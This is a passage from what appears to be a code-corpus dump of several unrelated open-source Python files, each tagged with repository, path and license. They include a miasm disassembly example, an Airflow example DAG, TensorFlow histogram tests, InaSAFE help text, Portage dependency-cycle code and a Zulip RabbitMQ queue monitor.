frappe.throw(_("Total weightage assigned should be 100%. It is {0}").format(str(total_w) + "%")) if frappe.db.get_value("Employee", self.employee, "user_id") != \ frappe.session.user and total == 0: frappe.throw(_("Total cannot be zero")) self.total_score = total def on_submit(self): frappe.db.set(self, 'status', 'Submitted') def on_cancel(self): frappe.db.set(self, 'status', 'Cancelled') @frappe.whitelist() def fetch_appraisal_template(source_name, target_doc=None): target_doc = get_mapped_doc("Appraisal Template", source_name, { "Appraisal Template": { "doctype": "Appraisal", }, "Appraisal Template Goal": { "doctype": "Appraisal Goal", } }, target_doc) return target_doc
agpl-3.0
chubbymaggie/miasm
example/disasm/callback.py
2
1866
from miasm2.core.bin_stream import bin_stream_str from miasm2.core.asmblock import AsmLabel, AsmConstraint, expr_is_label from miasm2.arch.x86.disasm import dis_x86_32, cb_x86_funcs def cb_x86_callpop(cur_bloc, symbol_pool, *args, **kwargs): """ 1000: call 1005 1005: pop Will give: 1000: push 1005 1005: pop """ # Pattern matching if len(cur_bloc.lines) < 1: return ## We want to match a CALL, always the last line of a basic block last_instr = cur_bloc.lines[-1] if last_instr.name != 'CALL': return ## The destination must be a label dst = last_instr.args[0] if not expr_is_label(dst): return ## The destination must be the next instruction if dst.name.offset != last_instr.offset + last_instr.l: return # Update instruction instance last_instr.name = 'PUSH' # Update next blocks to process in the disassembly engine cur_bloc.bto.clear() cur_bloc.add_cst(dst.name.offset, AsmConstraint.c_next, symbol_pool) # Prepare a tiny shellcode shellcode = ''.join(["\xe8\x00\x00\x00\x00", # CALL $ "X", # POP EAX "\xc3", # RET ]) bin_stream = bin_stream_str(shellcode) mdis = dis_x86_32(bin_stream) print "Without callback:\n" blocks = mdis.dis_multibloc(0) print "\n".join(str(block) for block in blocks) # Enable callback cb_x86_funcs.append(cb_x86_callpop) ## Other method: ## mdis.dis_bloc_callback = cb_x86_callpop # Clean disassembly cache mdis.job_done.clear() print "=" * 40 print "With callback:\n" blocks_after = mdis.dis_multibloc(0) print "\n".join(str(block) for block in blocks_after) # Ensure the callback has been called assert blocks.heads()[0].lines[0].name == "CALL" assert blocks_after.heads()[0].lines[0].name == "PUSH"
gpl-2.0
apache/airflow
airflow/providers/google/cloud/example_dags/example_gcs_to_bigquery.py
10
2303
# # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. """ Example DAG using GCSToBigQueryOperator. """ import os from airflow import models from airflow.providers.google.cloud.operators.bigquery import ( BigQueryCreateEmptyDatasetOperator, BigQueryDeleteDatasetOperator, ) from airflow.providers.google.cloud.transfers.gcs_to_bigquery import GCSToBigQueryOperator from airflow.utils.dates import days_ago DATASET_NAME = os.environ.get("GCP_DATASET_NAME", 'airflow_test') TABLE_NAME = os.environ.get("GCP_TABLE_NAME", 'gcs_to_bq_table') dag = models.DAG( dag_id='example_gcs_to_bigquery_operator', start_date=days_ago(2), schedule_interval=None, tags=['example'], ) create_test_dataset = BigQueryCreateEmptyDatasetOperator( task_id='create_airflow_test_dataset', dataset_id=DATASET_NAME, dag=dag ) # [START howto_operator_gcs_to_bigquery] load_csv = GCSToBigQueryOperator( task_id='gcs_to_bigquery_example', bucket='cloud-samples-data', source_objects=['bigquery/us-states/us-states.csv'], destination_project_dataset_table=f"{DATASET_NAME}.{TABLE_NAME}", schema_fields=[ {'name': 'name', 'type': 'STRING', 'mode': 'NULLABLE'}, {'name': 'post_abbr', 'type': 'STRING', 'mode': 'NULLABLE'}, ], write_disposition='WRITE_TRUNCATE', dag=dag, ) # [END howto_operator_gcs_to_bigquery] delete_test_dataset = BigQueryDeleteDatasetOperator( task_id='delete_airflow_test_dataset', dataset_id=DATASET_NAME, delete_contents=True, dag=dag ) create_test_dataset >> load_csv >> delete_test_dataset
apache-2.0
rabipanda/tensorflow
tensorflow/contrib/metrics/python/kernel_tests/histogram_ops_test.py
130
9577
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for histogram_ops.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np from tensorflow.contrib.metrics.python.ops import histogram_ops from tensorflow.python.framework import constant_op from tensorflow.python.framework import dtypes from tensorflow.python.ops import array_ops from tensorflow.python.ops import variables from tensorflow.python.platform import test class Strict1dCumsumTest(test.TestCase): """Test this private function.""" def test_empty_tensor_returns_empty(self): with self.test_session(): tensor = constant_op.constant([]) result = histogram_ops._strict_1d_cumsum(tensor, 0) expected = constant_op.constant([]) np.testing.assert_array_equal(expected.eval(), result.eval()) def test_length_1_tensor_works(self): with self.test_session(): tensor = constant_op.constant([3], dtype=dtypes.float32) result = histogram_ops._strict_1d_cumsum(tensor, 1) expected = constant_op.constant([3], dtype=dtypes.float32) np.testing.assert_array_equal(expected.eval(), result.eval()) def test_length_3_tensor_works(self): with self.test_session(): tensor = constant_op.constant([1, 2, 3], dtype=dtypes.float32) result = histogram_ops._strict_1d_cumsum(tensor, 3) expected = constant_op.constant([1, 3, 6], dtype=dtypes.float32) np.testing.assert_array_equal(expected.eval(), result.eval()) class AUCUsingHistogramTest(test.TestCase): def setUp(self): self.rng = np.random.RandomState(0) def test_empty_labels_and_scores_gives_nan_auc(self): with self.test_session(): labels = constant_op.constant([], shape=[0], dtype=dtypes.bool) scores = constant_op.constant([], shape=[0], dtype=dtypes.float32) score_range = [0, 1.] auc, update_op = histogram_ops.auc_using_histogram(labels, scores, score_range) variables.local_variables_initializer().run() update_op.run() self.assertTrue(np.isnan(auc.eval())) def test_perfect_scores_gives_auc_1(self): self._check_auc( nbins=100, desired_auc=1.0, score_range=[0, 1.], num_records=50, frac_true=0.5, atol=0.05, num_updates=1) def test_terrible_scores_gives_auc_0(self): self._check_auc( nbins=100, desired_auc=0.0, score_range=[0, 1.], num_records=50, frac_true=0.5, atol=0.05, num_updates=1) def test_many_common_conditions(self): for nbins in [50]: for desired_auc in [0.3, 0.5, 0.8]: for score_range in [[-1, 1], [-10, 0]]: for frac_true in [0.3, 0.8]: # Tests pass with atol = 0.03. Moved up to 0.05 to avoid flakes. self._check_auc( nbins=nbins, desired_auc=desired_auc, score_range=score_range, num_records=100, frac_true=frac_true, atol=0.05, num_updates=50) def test_large_class_imbalance_still_ok(self): # With probability frac_true ** num_records, each batch contains only True # records. In this case, ~ 95%. # Tests pass with atol = 0.02. Increased to 0.05 to avoid flakes. self._check_auc( nbins=100, desired_auc=0.8, score_range=[-1, 1.], num_records=10, frac_true=0.995, atol=0.05, num_updates=1000) def test_super_accuracy_with_many_bins_and_records(self): # Test passes with atol = 0.0005. Increased atol to avoid flakes. self._check_auc( nbins=1000, desired_auc=0.75, score_range=[0, 1.], num_records=1000, frac_true=0.5, atol=0.005, num_updates=100) def _check_auc(self, nbins=100, desired_auc=0.75, score_range=None, num_records=50, frac_true=0.5, atol=0.05, num_updates=10): """Check auc accuracy against synthetic data. Args: nbins: nbins arg from contrib.metrics.auc_using_histogram. desired_auc: Number in [0, 1]. The desired auc for synthetic data. score_range: 2-tuple, (low, high), giving the range of the resultant scores. Defaults to [0, 1.]. num_records: Positive integer. The number of records to return. frac_true: Number in (0, 1). Expected fraction of resultant labels that will be True. This is just in expectation...more or less may actually be True. atol: Absolute tolerance for final AUC estimate. num_updates: Update internal histograms this many times, each with a new batch of synthetic data, before computing final AUC. Raises: AssertionError: If resultant AUC is not within atol of theoretical AUC from synthetic data. """ score_range = [0, 1.] or score_range with self.test_session(): labels = array_ops.placeholder(dtypes.bool, shape=[num_records]) scores = array_ops.placeholder(dtypes.float32, shape=[num_records]) auc, update_op = histogram_ops.auc_using_histogram( labels, scores, score_range, nbins=nbins) variables.local_variables_initializer().run() # Updates, then extract auc. for _ in range(num_updates): labels_a, scores_a = synthetic_data(desired_auc, score_range, num_records, self.rng, frac_true) update_op.run(feed_dict={labels: labels_a, scores: scores_a}) labels_a, scores_a = synthetic_data(desired_auc, score_range, num_records, self.rng, frac_true) # Fetch current auc, and verify that fetching again doesn't change it. auc_eval = auc.eval() self.assertAlmostEqual(auc_eval, auc.eval(), places=5) msg = ('nbins: %s, desired_auc: %s, score_range: %s, ' 'num_records: %s, frac_true: %s, num_updates: %s') % (nbins, desired_auc, score_range, num_records, frac_true, num_updates) np.testing.assert_allclose(desired_auc, auc_eval, atol=atol, err_msg=msg) def synthetic_data(desired_auc, score_range, num_records, rng, frac_true): """Create synthetic boolean_labels and scores with adjustable auc. Args: desired_auc: Number in [0, 1], the theoretical AUC of resultant data. score_range: 2-tuple, (low, high), giving the range of the resultant scores num_records: Positive integer. The number of records to return. rng: Initialized np.random.RandomState random number generator frac_true: Number in (0, 1). Expected fraction of resultant labels that will be True. This is just in expectation...more or less may actually be True. Returns: boolean_labels: np.array, dtype=bool. scores: np.array, dtype=np.float32 """ # We prove here why the method (below) for computing AUC works. Of course we # also checked this against sklearn.metrics.roc_auc_curve. # # First do this for score_range = [0, 1], then rescale. # WLOG assume AUC >= 0.5, otherwise we will solve for AUC >= 0.5 then swap # the labels. # So for AUC in [0, 1] we create False and True labels # and corresponding scores drawn from: # F ~ U[0, 1], T ~ U[x, 1] # We have, # AUC # = P[T > F] # = P[T > F | F < x] P[F < x] + P[T > F | F > x] P[F > x] # = (1 * x) + (0.5 * (1 - x)). # Inverting, we have: # x = 2 * AUC - 1, when AUC >= 0.5. assert 0 <= desired_auc <= 1 assert 0 < frac_true < 1 if desired_auc < 0.5: flip_labels = True desired_auc = 1 - desired_auc frac_true = 1 - frac_true else: flip_labels = False x = 2 * desired_auc - 1 labels = rng.binomial(1, frac_true, size=num_records).astype(bool) num_true = labels.sum() num_false = num_records - labels.sum() # Draw F ~ U[0, 1], and T ~ U[x, 1] false_scores = rng.rand(num_false) true_scores = x + rng.rand(num_true) * (1 - x) # Reshape [0, 1] to score_range. def reshape(scores): return score_range[0] + scores * (score_range[1] - score_range[0]) false_scores = reshape(false_scores) true_scores = reshape(true_scores) # Place into one array corresponding with the labels. scores = np.nan * np.ones(num_records, dtype=np.float32) scores[labels] = true_scores scores[~labels] = false_scores if flip_labels: labels = ~labels return labels, scores if __name__ == '__main__': test.main()
apache-2.0
dynaryu/inasafe
safe/gui/tools/help/needs_manager_help.py
2
10496
# coding=utf-8 """Context help for minimum needs manager dialog.""" from safe.utilities.i18n import tr from safe import messaging as m from safe.messaging import styles INFO_STYLE = styles.INFO_STYLE __author__ = 'ismailsunni' def needs_manager_helps(): """Help message for Batch Dialog. .. versionadded:: 3.2.1 :returns: A message object containing helpful information. :rtype: messaging.message.Message """ message = m.Message() message.add(m.Brand()) message.add(heading()) message.add(content()) return message def heading(): """Helper method that returns just the header. This method was added so that the text could be reused in the other contexts. .. versionadded:: 3.2.2 :returns: A heading object. :rtype: safe.messaging.heading.Heading """ message = m.Heading(tr('Minimum needs manager help'), **INFO_STYLE) return message def content(): """Helper method that returns just the content. This method was added so that the text could be reused in the dock_help module. .. versionadded:: 3.2.2 :returns: A message object without brand element. :rtype: safe.messaging.message.Message """ message = m.Message() message.add(m.Paragraph(tr( 'During and after a disaster, providing for the basic human minimum ' 'needs of food, water, hygiene and shelter is an important element of ' 'your contingency plan. InaSAFE has a customisable minimum needs ' 'system that allows you to define country or region specific ' 'requirements for compiling a needs report where the exposure ' 'layer represents population.' ))) message.add(m.Paragraph(tr( 'By default InaSAFE uses minimum needs defined for Indonesia - ' 'and ships with additional profiles for the Philippines and Tanzania. ' 'You can customise these or add your own region-specific profiles too.' ))) message.add(m.Paragraph(tr( 'Minimum needs are grouped into regional or linguistic \'profiles\'. ' 'The default profile is \'BNPB_en\' - the english profile for the ' 'national disaster agency in Indonesia.' 'You will see that this profile defines requirements for displaced ' 'persons in terms of Rice, Drinking Water, Clean Water (for bathing ' 'etc.), Family Kits (with personal hygiene items) and provision of ' 'toilets.' ))) message.add(m.Paragraph(tr( 'Each item in the profile can be customised or removed. For example ' 'selecting the first item in the list and then clicking on the ' '\'pencil\' icon will show the details of how it was defined.' 'If you scroll up and down in the panel you will see that for each ' 'item, you can set a name, description, units (in singular, ' 'plural and abbreviated forms), specify maxima and minima for the ' 'quantity of item allowed, a default and a frequency. You would use ' 'the maxima and minima to ensure that disaster managers never ' 'allocate amounts that will not be sufficient for human livelihood, ' 'and also that will not overtax the logistics operation for those ' 'providing humanitarian relief.' ))) message.add(m.Paragraph(tr( 'The final item in the item configuration is the \'readable sentence\'' 'which bears special discussion. Using a simple system of tokens you ' 'can construct a sentence that will be used in the generated needs ' 'report.' ))) message.add(m.Heading(tr('Minimum needs profiles'), **INFO_STYLE)) message.add(m.Paragraph(tr( 'A profile is a collection of resources that define the minimum needs ' 'for a particular country or region. Typically a profile should be ' 'based on a regional, national or international standard. The ' 'actual definition of which resources are needed in a given ' 'profile is dependent on the local conditions and customs for the ' 'area where the contingency plan is being devised.' ))) message.add(m.Paragraph(tr( 'For example in the middle east, rice is a staple food whereas in ' 'South Africa, maize meal is a staple food and thus the contingency ' 'planning should take these localised needs into account.' ))) message.add(m.Heading(tr('Minimum needs resources'), **INFO_STYLE)) message.add(m.Paragraph(tr( 'Each item in a minimum needs profile is a resource. Each resource ' 'is described as a simple natural language sentence e.g.:' ))) message.add(m.EmphasizedText(tr( 'Each person should be provided with 2.8 kilograms of Rice weekly.' ))) message.add(m.Paragraph(tr( 'By clicking on a resource entry in the profile window, and then ' 'clicking the black pencil icon you will be able to edit the ' 'resource using the resource editor. Alternatively you can create a ' 'new resource for a profile by clicking on the black + icon in ' 'the profile manager. You can also remove any resource from a ' 'profile using the - icon in the profile manager.'))) message.add(m.Heading(tr('Resource Editor'), **INFO_STYLE)) message.add(m.Paragraph(tr( 'When switching to edit or add resource mode, the minimum needs ' 'manager will be updated to show the resource editor. Each ' 'resource is described in terms of:' ))) bullets = m.BulletedList() bullets.add(m.Text( m.ImportantText(tr( 'resource name')), tr(' - e.g. Rice'))) bullets.add(m.Text( m.ImportantText(tr( 'a description of the resource')), tr(' - e.g. Basic food'))) bullets.add(m.Text( m.ImportantText(tr( 'unit in which the resource is provided')), tr(' - e.g. kilogram'))) bullets.add(m.Text( m.ImportantText(tr( 'pluralised form of the units')), tr(' - e.g. kilograms'))) bullets.add(m.Text( m.ImportantText(tr( 'abbreviation for the unit')), tr(' - e.g. kg'))) bullets.add(m.Text( m.ImportantText(tr( 'the default allocation for the resource')), tr(' - e.g. 2.8. This number can be overridden on a ' 'per-analysis basis'))) bullets.add(m.Text( m.ImportantText(tr( 'minimum allowed which is used to prevent allocating')), tr(' - e.g. no drinking water to displaced persons'))) bullets.add(m.ImportantText(tr( 'maximum allowed which is used to set a sensible upper ' 'limit for the resource'))) bullets.add(m.ImportantText(tr( 'a readable sentence which is used to compile the ' 'sentence describing the resource in reports.'))) message.add(bullets) message.add(m.Paragraph(tr( 'These parameters are probably all fairly self explanatory, but ' 'the readable sentence probably needs further detail. The ' 'sentence is compiled using a simple keyword token replacement ' 'system. The following tokens can be used:'))) bullets = m.BulletedList() bullets.add(m.Text('{{ Default }}')) bullets.add(m.Text('{{ Unit }}')) bullets.add(m.Text('{{ Units }}')) bullets.add(m.Text('{{ Unit abbreviation }}')) bullets.add(m.Text('{{ Resource name }}')) bullets.add(m.Text('{{ Frequency }}')) bullets.add(m.Text('{{ Minimum allowed }}')) bullets.add(m.Text('{{ Maximum allowed }}')) message.add(bullets) message.add(m.Paragraph(tr( 'When the token is placed in the sentence it will be replaced with ' 'the actual value at report generation time. This contrived example ' 'shows a tokenised sentence that includes all possible keywords:' ))) message.add(m.EmphasizedText(tr( 'A displaced person should be provided with {{ %s }} ' '{{ %s }}/{{ %s }}/{{ %s }} of {{ %s }}. Though no less than {{ %s }} ' 'and no more than {{ %s }}. This should be provided {{ %s }}.' % ( 'Default', 'Unit', 'Units', 'Unit abbreviation', 'Resource name', 'Minimum allowed', 'Maximum allowed', 'Frequency' ) ))) message.add(m.Paragraph(tr( 'Would generate a human readable sentence like this:'))) message.add(m.ImportantText(tr( 'A displaced person should be provided with 2.8 kilogram/kilograms/kg ' 'of rice. Though no less than 0 and no more than 100. This should ' 'be provided daily.' ))) message.add(m.Paragraph(tr( 'Once you have populated the resource elements, click the Save ' 'resource button to return to the profile view. You will see the ' 'new resource added in the profile\'s resource list.' ))) message.add(m.Heading(tr('Managing profiles'), **INFO_STYLE)) message.add(m.Paragraph(tr( 'When switching to edit or add resource mode, the minimum needs ' 'manager will be updated to show the resource editor. Each ' 'resource is described in terms of:' ))) message.add(m.Paragraph(tr( 'In addition to the profiles that come as standard with InaSAFE, you ' 'can create new ones, either from scratch, or based on an existing ' 'one (which you can then modify).' ))) message.add(m.Paragraph(tr( 'Use the New button to create new profile. When prompted, give your ' 'profile a name e.g. \'JakartaProfile\'.' ))) message.add(m.Paragraph(tr( 'Note: The profile must be saved in your home directory under ' '.qgis2/minimum_needs in order for InaSAFE to successfully detect it.' ))) message.add(m.Paragraph(tr( 'An alternative way to create a new profile is to use the Save as to ' 'clone an existing profile. The clone profile can then be edited ' 'according to your specific needs.' ))) message.add(m.Heading(tr('Active profile'), **INFO_STYLE)) message.add(m.Paragraph(tr( 'It is important to note, that which ever profile you select in the ' 'Profile pick list, will be considered active and will be used as ' 'the basis for all minimum needs analysis. You need to restart ' 'QGIS before the changed profile become active.' ))) return message
gpl-3.0
yjxtogo/horizon
horizon/utils/validators.py
32
2470
# Copyright 2012 Nebula, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import re from django.core.exceptions import ValidationError # noqa from django.core import validators # noqa from django.utils.translation import ugettext_lazy as _ from horizon import conf def validate_port_range(port): if port not in range(-1, 65536): raise ValidationError(_("Not a valid port number")) def validate_ip_protocol(ip_proto): if ip_proto not in range(-1, 256): raise ValidationError(_("Not a valid IP protocol number")) def password_validator(): return conf.HORIZON_CONFIG["password_validator"]["regex"] def password_validator_msg(): return conf.HORIZON_CONFIG["password_validator"]["help_text"] def validate_port_or_colon_separated_port_range(port_range): """Accepts a port number or a single-colon separated range.""" if port_range.count(':') > 1: raise ValidationError(_("One colon allowed in port range")) ports = port_range.split(':') for port in ports: try: if int(port) not in range(-1, 65536): raise ValidationError(_("Not a valid port number")) except ValueError: raise ValidationError(_("Port number must be integer")) def validate_metadata(value): error_msg = _('Invalid metadata entry. Use comma-separated' ' key=value pairs') if value: specs = value.split(",") for spec in specs: keyval = spec.split("=") # ensure both sides of "=" exist, but allow blank value if not len(keyval) == 2 or not keyval[0]: raise ValidationError(error_msg) # Same as POSIX [:print:]. Accordingly, diacritics are disallowed. PRINT_REGEX = re.compile(r'^[\x20-\x7E]*$') validate_printable_ascii = validators.RegexValidator( PRINT_REGEX, _("The string may only contain ASCII printable characters."), "invalid_characters")
apache-2.0
mm1ke/portage
pym/_emerge/resolver/circular_dependency.py
8
9294
# Copyright 2010-2013 Gentoo Foundation # Distributed under the terms of the GNU General Public License v2 from __future__ import print_function, unicode_literals from itertools import chain, product import logging from portage.dep import use_reduce, extract_affecting_use, check_required_use, get_required_use_flags from portage.exception import InvalidDependString from portage.output import colorize from portage.util import writemsg_level from _emerge.DepPrioritySatisfiedRange import DepPrioritySatisfiedRange from _emerge.Package import Package class circular_dependency_handler(object): MAX_AFFECTING_USE = 10 def __init__(self, depgraph, graph): self.depgraph = depgraph self.graph = graph self.all_parent_atoms = depgraph._dynamic_config._parent_atoms if "--debug" in depgraph._frozen_config.myopts: # Show this debug output before doing the calculations # that follow, so at least we have this debug info # if we happen to hit a bug later. writemsg_level("\n\ncircular dependency graph:\n\n", level=logging.DEBUG, noiselevel=-1) self.debug_print() self.cycles, self.shortest_cycle = self._find_cycles() #Guess if it is a large cluster of cycles. This usually requires #a global USE change. self.large_cycle_count = len(self.cycles) > 3 self.merge_list = self._prepare_reduced_merge_list() #The digraph dump self.circular_dep_message = self._prepare_circular_dep_message() #Suggestions, in machine and human readable form self.solutions, self.suggestions = self._find_suggestions() def _find_cycles(self): shortest_cycle = None cycles = self.graph.get_cycles(ignore_priority=DepPrioritySatisfiedRange.ignore_medium_soft) for cycle in cycles: if not shortest_cycle or len(cycle) < len(shortest_cycle): shortest_cycle = cycle return cycles, shortest_cycle def _prepare_reduced_merge_list(self): """ Create a merge to be displayed by depgraph.display(). This merge list contains only packages involved in the circular deps. """ display_order = [] tempgraph = self.graph.copy() while tempgraph: nodes = tempgraph.leaf_nodes() if not nodes: node = tempgraph.order[0] else: node = nodes[0] display_order.append(node) tempgraph.remove(node) return tuple(display_order) def _prepare_circular_dep_message(self): """ Like digraph.debug_print(), but prints only the shortest cycle. """ if not self.shortest_cycle: return None msg = [] indent = "" for pos, pkg in enumerate(self.shortest_cycle): parent = self.shortest_cycle[pos-1] priorities = self.graph.nodes[parent][0][pkg] if pos > 0: msg.append(indent + "%s (%s)" % (pkg, priorities[-1],)) else: msg.append(indent + "%s depends on" % pkg) indent += " " pkg = self.shortest_cycle[0] parent = self.shortest_cycle[-1] priorities = self.graph.nodes[parent][0][pkg] msg.append(indent + "%s (%s)" % (pkg, priorities[-1],)) return "\n".join(msg) def _get_use_mask_and_force(self, pkg): return pkg.use.mask, pkg.use.force def _get_autounmask_changes(self, pkg): needed_use_config_change = self.depgraph._dynamic_config._needed_use_config_changes.get(pkg) if needed_use_config_change is None: return frozenset() use, changes = needed_use_config_change return frozenset(changes.keys()) def _find_suggestions(self): if not self.shortest_cycle: return None, None suggestions = [] final_solutions = {} for pos, pkg in enumerate(self.shortest_cycle): parent = self.shortest_cycle[pos-1] priorities = self.graph.nodes[parent][0][pkg] parent_atoms = self.all_parent_atoms.get(pkg) if priorities[-1].buildtime: dep = " ".join(parent._metadata[k] for k in Package._buildtime_keys) elif priorities[-1].runtime: dep = parent._metadata["RDEPEND"] for ppkg, atom in parent_atoms: if ppkg == parent: changed_parent = ppkg parent_atom = atom.unevaluated_atom break try: affecting_use = extract_affecting_use(dep, parent_atom, eapi=parent.eapi) except InvalidDependString: if not parent.installed: raise affecting_use = set() # Make sure we don't want to change a flag that is # a) in use.mask or use.force # b) changed by autounmask usemask, useforce = self._get_use_mask_and_force(parent) autounmask_changes = self._get_autounmask_changes(parent) untouchable_flags = frozenset(chain(usemask, useforce, autounmask_changes)) affecting_use.difference_update(untouchable_flags) #If any of the flags we're going to touch is in REQUIRED_USE, add all #other flags in REQUIRED_USE to affecting_use, to not lose any solution. required_use_flags = get_required_use_flags( parent._metadata.get("REQUIRED_USE", ""), eapi=parent.eapi) if affecting_use.intersection(required_use_flags): # TODO: Find out exactly which REQUIRED_USE flags are # entangled with affecting_use. We have to limit the # number of flags since the number of loops is # exponentially related (see bug #374397). total_flags = set() total_flags.update(affecting_use, required_use_flags) total_flags.difference_update(untouchable_flags) if len(total_flags) <= self.MAX_AFFECTING_USE: affecting_use = total_flags affecting_use = tuple(affecting_use) if not affecting_use: continue if len(affecting_use) > self.MAX_AFFECTING_USE: # Limit the number of combinations explored (bug #555698). # First, discard irrelevent flags that are not enabled. # Since extract_affecting_use doesn't distinguish between # positive and negative effects (flag? vs. !flag?), assume # a positive relationship. current_use = self.depgraph._pkg_use_enabled(parent) affecting_use = tuple(flag for flag in affecting_use if flag in current_use) if len(affecting_use) > self.MAX_AFFECTING_USE: # There are too many USE combinations to explore in # a reasonable amount of time. continue #We iterate over all possible settings of these use flags and gather #a set of possible changes #TODO: Use the information encoded in REQUIRED_USE solutions = set() for use_state in product(("disabled", "enabled"), repeat=len(affecting_use)): current_use = set(self.depgraph._pkg_use_enabled(parent)) for flag, state in zip(affecting_use, use_state): if state == "enabled": current_use.add(flag) else: current_use.discard(flag) try: reduced_dep = use_reduce(dep, uselist=current_use, flat=True) except InvalidDependString: if not parent.installed: raise reduced_dep = None if reduced_dep is not None and \ parent_atom not in reduced_dep: #We found an assignment that removes the atom from 'dep'. #Make sure it doesn't conflict with REQUIRED_USE. required_use = parent._metadata.get("REQUIRED_USE", "") if check_required_use(required_use, current_use, parent.iuse.is_valid_flag, eapi=parent.eapi): use = self.depgraph._pkg_use_enabled(parent) solution = set() for flag, state in zip(affecting_use, use_state): if state == "enabled" and \ flag not in use: solution.add((flag, True)) elif state == "disabled" and \ flag in use: solution.add((flag, False)) solutions.add(frozenset(solution)) for solution in solutions: ignore_solution = False for other_solution in solutions: if solution is other_solution: continue if solution.issuperset(other_solution): ignore_solution = True if ignore_solution: continue #Check if a USE change conflicts with use requirements of the parents. #If a requiremnet is hard, ignore the suggestion. #If the requirment is conditional, warn the user that other changes might be needed. followup_change = False parent_parent_atoms = self.depgraph._dynamic_config._parent_atoms.get(changed_parent) for ppkg, atom in parent_parent_atoms: atom = atom.unevaluated_atom if not atom.use: continue for flag, state in solution: if flag in atom.use.enabled or flag in atom.use.disabled: ignore_solution = True break elif atom.use.conditional: for flags in atom.use.conditional.values(): if flag in flags: followup_change = True break if ignore_solution: break if ignore_solution: continue changes = [] for flag, state in solution: if state: changes.append(colorize("red", "+"+flag)) else: changes.append(colorize("blue", "-"+flag)) msg = "- %s (Change USE: %s)\n" \ % (parent.cpv, " ".join(changes)) if followup_change: msg += " (This change might require USE changes on parent packages.)" suggestions.append(msg) final_solutions.setdefault(pkg, set()).add(solution) return final_solutions, suggestions def debug_print(self): """ Create a copy of the digraph, prune all root nodes, and call the debug_print() method. """ graph = self.graph.copy() while True: root_nodes = graph.root_nodes( ignore_priority=DepPrioritySatisfiedRange.ignore_medium_soft) if not root_nodes: break graph.difference_update(root_nodes) graph.debug_print()
gpl-2.0
kou/zulip
scripts/lib/check_rabbitmq_queue.py
3
6873
import json import os import re import subprocess import time from collections import defaultdict from typing import Any, DefaultDict, Dict, List ZULIP_PATH = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) normal_queues = [ 'deferred_work', 'digest_emails', 'email_mirror', 'embed_links', 'embedded_bots', 'error_reports', 'invites', 'email_senders', 'missedmessage_emails', 'missedmessage_mobile_notifications', 'outgoing_webhooks', 'signups', 'user_activity', 'user_activity_interval', 'user_presence', ] OK = 0 WARNING = 1 CRITICAL = 2 UNKNOWN = 3 states = { 0: "OK", 1: "WARNING", 2: "CRITICAL", 3: "UNKNOWN", } MAX_SECONDS_TO_CLEAR: DefaultDict[str, int] = defaultdict( lambda: 30, digest_emails=1200, missedmessage_mobile_notifications=120, embed_links=60, ) CRITICAL_SECONDS_TO_CLEAR: DefaultDict[str, int] = defaultdict( lambda: 60, missedmessage_mobile_notifications=180, digest_emails=1800, embed_links=90, ) def analyze_queue_stats(queue_name: str, stats: Dict[str, Any], queue_count_rabbitmqctl: int) -> Dict[str, Any]: now = int(time.time()) if stats == {}: return dict(status=UNKNOWN, name=queue_name, message='invalid or no stats data') if now - stats['update_time'] > 180 and queue_count_rabbitmqctl > 10: # Queue isn't updating the stats file and has some events in # the backlog, it's likely stuck. # # TODO: There's an unlikely race condition here - if the queue # was fully emptied and was idle due to no new events coming # for over 180 seconds, suddenly gets a burst of events and # this code runs exactly in the very small time window between # those events popping up and the queue beginning to process # the first one (which will refresh the stats file at the very # start), we'll incorrectly return the CRITICAL status. The # chance of that happening should be negligible because the queue # worker should wake up immediately and log statistics before # starting to process the first event. return dict(status=CRITICAL, name=queue_name, message='queue appears to be stuck, last update {}, queue size {}'.format( stats['update_time'], queue_count_rabbitmqctl)) current_size = queue_count_rabbitmqctl average_consume_time = stats['recent_average_consume_time'] if average_consume_time is None: # Queue just started; we can't effectively estimate anything. # # If the queue is stuck in this state and not processing # anything, eventually the `update_time` rule above will fire. return dict(status=OK, name=queue_name, message='') expected_time_to_clear_backlog = current_size * average_consume_time if expected_time_to_clear_backlog > MAX_SECONDS_TO_CLEAR[queue_name]: if expected_time_to_clear_backlog > CRITICAL_SECONDS_TO_CLEAR[queue_name]: status = CRITICAL else: status = WARNING return dict(status=status, name=queue_name, message=f'clearing the backlog will take too long: {expected_time_to_clear_backlog}s, size: {current_size}') return dict(status=OK, name=queue_name, message='') WARN_COUNT_THRESHOLD_DEFAULT = 10 CRITICAL_COUNT_THRESHOLD_DEFAULT = 50 def check_other_queues(queue_counts_dict: Dict[str, int]) -> List[Dict[str, Any]]: """ Do a simple queue size check for queues whose workers don't publish stats files.""" results = [] for queue, count in queue_counts_dict.items(): if queue in normal_queues: continue if count > CRITICAL_COUNT_THRESHOLD_DEFAULT: results.append(dict(status=CRITICAL, name=queue, message=f'count critical: {count}')) elif count > WARN_COUNT_THRESHOLD_DEFAULT: results.append(dict(status=WARNING, name=queue, message=f'count warning: {count}')) else: results.append(dict(status=OK, name=queue, message='')) return results def check_rabbitmq_queues() -> None: pattern = re.compile(r'(\w+)\t(\d+)\t(\d+)') if 'USER' in os.environ and not os.environ['USER'] in ['root', 'rabbitmq']: print("This script must be run as the root or rabbitmq user") list_queues_output = 